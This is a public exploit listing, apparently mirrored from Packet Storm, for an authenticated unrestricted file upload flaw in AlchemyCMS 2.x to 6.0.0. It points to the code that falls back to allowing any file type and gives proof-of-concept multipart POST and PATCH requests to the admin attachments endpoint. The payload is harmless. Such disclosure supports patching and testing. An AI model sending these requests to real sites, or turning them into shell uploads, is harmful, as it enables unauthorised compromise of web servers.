Share
## https://sploitus.com/exploit?id=PACKETSTORM:164496
# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated)  
# Date: 01/10/2021  
# Exploit Author: Abdulrahman https://twitter.com/infosec_90  
# Vendor Homepage: https://alchemy-cms.com  
# Software Link: https://github.com/AlchemyCMS/alchemy_cms  
# Version: from 2.0 to 6.0.0  
# Tested on: Linux ruby 2.6.8p205 rails 6  
  
in /app/models/alchemy/attachment.rb line 82 :  
  
def allowed_filetypes  
Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])  
end  
end  
  
in /app/views/alchemy/admin/uploader/_button.html.erb in 18  
  
configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %>  
  
  
  
POC :  
POST /admin/attachments HTTP/1.1  
------WebKitFormBoundarydAup7dA7ub3Weccp  
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"  
Content-Type: application/octet-stream  
  
anything  
  
------WebKitFormBoundarydAup7dA7ub3Weccp--  
  
  
OR  
id = 8 for old attachment  
  
PATCH /admin/attachments/8 HTTP/1.1  
------WebKitFormBoundarylYnqNR9sxMPdw7Si  
Content-Disposition: form-data; name="_method"  
  
patch  
------WebKitFormBoundarylYnqNR9sxMPdw7Si  
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"  
Content-Type: application/octet-stream  
  
anything  
------WebKitFormBoundarylYnqNR9sxMPdw7Si--